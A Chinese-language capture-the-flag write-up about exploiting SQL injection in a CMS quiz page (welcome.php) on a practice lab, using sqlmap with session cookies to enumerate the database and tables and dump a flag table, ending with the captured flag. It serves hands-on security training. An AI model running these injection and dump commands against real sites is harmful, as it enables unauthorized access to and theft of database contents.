简介

这是一个CMS系统的漏洞,存在SQL注入漏洞。
本人是用春秋云境搭建的漏洞环境练习。

详解

提示:welcome.php存在sql漏洞

打开网址,首页是一个登录页面。随意注册一个账号,然后登录。页面如下

16788459263952.png
此页面的地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=1
怀疑参数q存在注入漏洞,使用sqlmap注入后发现不是。

尝试点击第一行的start按钮,发现页面报错且网址还是welcome.php,页面如下

16788466291945.png
此页面地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

这个页面GET参数比较多极有可能存在漏洞,使用sqlmap扫描

注意加上cookie

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10"

提示eid参数和n参数存在注入漏洞。继续扫描当前数据库

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" --current-db

扫描到当前数据库为----ctf ,继续扫描库中的数据表

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" --tables

数据表一共9个,发现有一张表名flag表,表中应该存着要找的flag,获取flag表数据

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" -T "flag" --dump

成功找到flag----flag{555f3edc-fdc3-4548-ae99-ff3d91107137}

结语

使用sqlmap是比较快,但是有时间建议手工注入,能力提升的页比较快。